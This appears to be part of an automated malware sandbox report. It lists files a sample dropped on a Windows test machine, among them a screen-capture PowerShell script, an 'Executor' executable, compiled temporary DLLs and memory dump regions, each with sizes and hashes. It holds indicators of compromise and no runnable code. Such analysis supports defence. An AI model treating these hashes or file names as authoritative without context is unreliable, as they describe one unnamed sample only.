762d5ff80a9fe0c2361d5a50a65b4625ca30a65fefeda8a52c7dd41a79162e3fe6f8623808730d07fe1b199e514b9fe3937926891beb5113119469d4fcd3e4a2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
1864a5dcbc10fc28efa11aab94f4420d

SHA1
62ce3e03365325fe27cef3e6268d4ba668aa5909

SHA256
5831eedb3ad35d78239bf6a7b0f0a08f6d840eee3e987dc9f587c85bec1236e4

SHA512
78cd86c95c631670d446997f6e4481dd8a84a027d9be0569af72c04ac9af82eccc947856d2e2e25d09c2ac02e3ad26d81505da85f00ae3c7d1d134dbf8929ab9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8baa55f4c9614712ef2edb673b84f197

SHA1
f95f528a8dbff1c7c8abbc320633ad0ec097c902

SHA256
e2f3a14489a2526cb4341b9e7220531e1f46c861ea11d0a1ed17c901f6a1bee3

SHA512
899e33b413570a0a5008367e4286b675325635da89f5271c8b466ffd748c23066e96ec379532b2045c258114a9f3cbb202f32320b3769e414bb768119ec39cc3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\1lbjxtdh\1lbjxtdh.dll

Filesize
3KB

MD5
8646a62bffcb54142004e2577b4c2c0c

SHA1
e19e8b6b3e0af8e2fb74585efed9b84be6620f76

SHA256
9c4922609e1ae095317880ad3062a4a3456bad460f2cba7a7239e96936e998c9

SHA512
3615b478aaa8fb006e433480af87d1e04cf0d9d067be2d4e32d3fbc021172022efb7bc63d9a79078e9e184a8fbc5dd6dfb9f778504be3a9c4eafc5f4ec37eb4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1

Filesize
2KB

MD5
75d6c1d8d4b896dd253106b2400ca8a8

SHA1
d946e5362af11c2af2f8d2f50803b21fc9e1eb38

SHA256
d8c1d70e1a7d108ceb8971532cbe6e83443bdee414629b6e91ac32dc65779734

SHA512
968f33bf8eaeb5a57dd81505ae3b92a5811860031d430e64e4f7dd77d5f24b15f8d10f0051c33e0e8d324717ad133c94feb7ea083dfe68561f5abc1a4cde661d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Executor\temp.ps1

Filesize
379B

MD5
18047e197c6820559730d01035b2955a

SHA1
277179be54bba04c0863aebd496f53b129d47464

SHA256
348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3

SHA512
1942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877

Download Submit
C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe

Filesize
37.6MB

MD5
8eacf3f9be7e3735352c4020fc4e05e9

SHA1
0bb6c048d9e683e152de21f7d368a4c151095504

SHA256
4c5b20b4ca8009ab72a76ed7fa6e09bd1b0b78969980f2b49d9a6641439c8d7e

SHA512
2f5c54c4561f14fbf9a58075dffe268247f3af3408084c12a8a7ed0fbb33f01448e85a06ba684b037e0489fbcbb7481a825cf23785c7b7c1d60c28467825e3f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES6D9E.tmp

Filesize
1KB

MD5
f2150389aeed5fc5841f8baa927b7874

SHA1
e6be2c463e86bcca0838d299416c855bc4511044

SHA256
6506ee5407360805508e2469078b7c10582cf517a72359c21e5d85d671f64907

SHA512
03f440d1d3409dada72d3313d33216b442df8f06810680648accf3a3979223d2957546d7c3b0d4b91454664174c6249329ea89438c4d5a1d86bd73ce499730cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES74D2.tmp

Filesize
1KB

MD5
aa7b5629770a8fe1c4d251754ce15d4d

SHA1
3bc355a09fdc27263bb2ef2c288d520caf76ea03

SHA256
f06427397b79ae397a08d5dc05e1a8da9d3c2e1be0b0b8aabae47d1521474fda

SHA512
b9b065996e7ece638c61acc1956cff9d4314c59c423f3405f3898d44f931676543c769735e8396c4ef6c7dcd1e8e676f9a26c8cb9d121b61eba6b372be4cb657

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_djvp1beb.3sx.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\jrtvppjd\jrtvppjd.dll

Filesize
3KB

MD5
2de93ac3f82f511eb40387debb9cb343

SHA1
6aae57e00d508a7ee6812f0df8c0dfdd9415f81b

SHA256
ee350af3055020e18e35734f3a3c41d037c43a350ebd57f25e48a262ea5896a4

SHA512
c989d2a6ff93fc59fa1a00bc82cb0dd9c26a954ed77c23a2ef320de6c34e3a59b71b14c83411f898f25764298d25c439e3cf537ceb24a3cdaea9e8ce3e8edb08

Download Submit
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

Filesize
1.8MB

MD5
66a65322c9d362a23cf3d3f7735d5430

SHA1
ed59f3e4b0b16b759b866ef7293d26a1512b952e

SHA256
f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c

SHA512
0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1lbjxtdh\1lbjxtdh.0.cs

Filesize
311B

MD5
7bc8de6ac8041186ed68c07205656943

SHA1
673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75

SHA256
36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697

SHA512
0495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1lbjxtdh\1lbjxtdh.cmdline

Filesize
369B

MD5
2cfad92bf4289c74e6b410de5fe366be

SHA1
1dfa11e140c8183855580026b55d233119b98f50

SHA256
d6514cc536445aa954cdbf761babfce964c8b12eb5a76ac1edbff1b79ad3236d

SHA512
69fcb96c02e9eb1147902bcb0a29bd0dda7135b050a3539e55349551670de6c4581b5a15154dcae6600b1ab3ac471029406dfb29927102e578055c60ad5c1750

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1lbjxtdh\CSC7912D2EB102E469BAB2DA46F11C232B8.TMP

Filesize
652B

MD5
25f65bab4ab608203f4666f3186e249f

SHA1
1de43ca469c70ffdf137a92ae2ae80c05303e9b8

SHA256
17fd240479f8a32c3459c6305a4d8329451080b7d8d8dd46e5437e4899ece5b3

SHA512
7e1ac08a21b4bdfa67b304cde95d5c780ec84055b488a9f585f2cf1b80c9cb9825bf224d52a209a873a1b58849a36565311fb08aed21d05bf1968aaf5e976450

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jrtvppjd\CSC9833EEABE32E432F97135D1DABD333AC.TMP

Filesize
652B

MD5
d31cb3427e750abc89ba4749bae4034a

SHA1
362fbcf25b4cab558bb1ab038ecadeb3d74e536c

SHA256
1b6ee35ba7ac2a27a44394d9c069d8a7eef48ad9398d7fc5c7fe04c843ac547a

SHA512
7bc60657893f0ebdfbd126e884dedb0048959fb0f992bf03e0526effc2accc3707b12de71def113c9cb8d2a683d5c652560d2f2ea6c204f64947db1670509999

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jrtvppjd\jrtvppjd.0.cs

Filesize
426B

MD5
b462a7b0998b386a2047c941506f7c1b

SHA1
61e8aa007164305a51fa2f1cebaf3f8e60a6a59f

SHA256
a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35

SHA512
eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jrtvppjd\jrtvppjd.cmdline

Filesize
369B

MD5
80785b2ae1d1310ec555bb6d6416e6b8

SHA1
ea09e58b6b4c33d9f97555d268ba6e2518ce9f93

SHA256
ef3d53a9e8d720c0a5ac204c5304f567bb29c6f28f1352a50020f98fbcc78092

SHA512
864420a4f98d720149f90d915c25679a77ae09fb4dd265e315683a0d42059ed6420736be12f4cba07350a087e64f98aaaa557468899adea25f2ef37ccebc4a7e

Download Submit
memory/1360-121-0x00000210DDE60000-0x00000210DDE68000-memory.dmp

Filesize
32KB

Download
memory/1360-108-0x00000210DDEB0000-0x00000210DDEF6000-memory.dmp

Filesize
280KB

Download
memory/2196-216-0x000001C07C870000-0x000001C07C878000-memory.dmp

Filesize
32KB

Download
memory/2628-25-0x00007FFFE77F0000-0x00007FFFE82B2000-memory.dmp

Filesize
10.8MB

Download
memory/2628-0-0x00007FFFE77F3000-0x00007FFFE77F5000-memory.dmp

Filesize
8KB

Download
memory/2628-12-0x00007FFFE77F0000-0x00007FFFE82B2000-memory.dmp

Filesize
10.8MB

Download
memory/2628-11-0x00007FFFE77F0000-0x00007FFFE82B2000-memory.dmp

Filesize
10.8MB

Download
memory/2628-10-0x00007FFFE77F0000-0x00007FFFE82B2000-memory.dmp

Filesize
10.8MB

Download
memory/2628-9-0x000001EBD2460000-0x000001EBD2482000-memory.dmp

Filesize
136KB

Download
memory/4108-134-0x0000016B34D20000-0x0000016B34D70000-memory.dmp

Filesize
320KB

Download